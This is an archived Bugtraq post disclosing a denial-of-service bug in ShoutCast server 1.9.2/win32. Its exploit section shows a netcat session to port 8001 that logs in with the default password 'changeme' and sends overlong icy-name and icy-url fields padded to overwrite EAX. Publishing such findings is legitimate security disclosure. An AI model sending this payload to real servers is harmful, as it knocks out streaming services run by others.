Bugtraq mailing list archives
ShoutCast server 1.9.2/win32
From: HEX <hex@hex_net_ru.securityfocus.com>
Date: Mon, 3 Nov 2003 00:42:15 +0300
Informations : °°°°°°°°°°°° Language : Microsoft Visual C++ v5.0/v6.0 (MFC) Bugged Version : ShoutCast server 1.9.2/win32 (and less ?) Patched version : none Website : http://www.shoutcast.com Problems : DoS if we know the password from the server Objects : °°°°°°° - sc_serv.exe vulnerable variable: icy-name(Server Desc) and icy-url(Stream URL) Exploits : °°°°°°°°
nc target 8001
changeme icy-name:AAA...[Ax275]BBBB[rewrite EAX] icy-genre:DoS radio icy-url:AAA...[Ax288]BBBB[rewrite EAX] icy-pub:1 icy-irc:N/A icy-icq:N/A icy-aim:N/A icy-br:160 ... stream audio data ... P.S. Default password "changeme" !!! Patch/More Details : °°°°°°°°°°°°°°°°°° Waiting for the patch at http://www.shoutcast.com ... [ Local time 16:14 | Device not ready - девица не готова! ] [ Copyright by [HEX] | mailto: hex(a)hex.net.ru ]
Current thread:
- ShoutCast server 1.9.2/win32 HEX (Nov 03)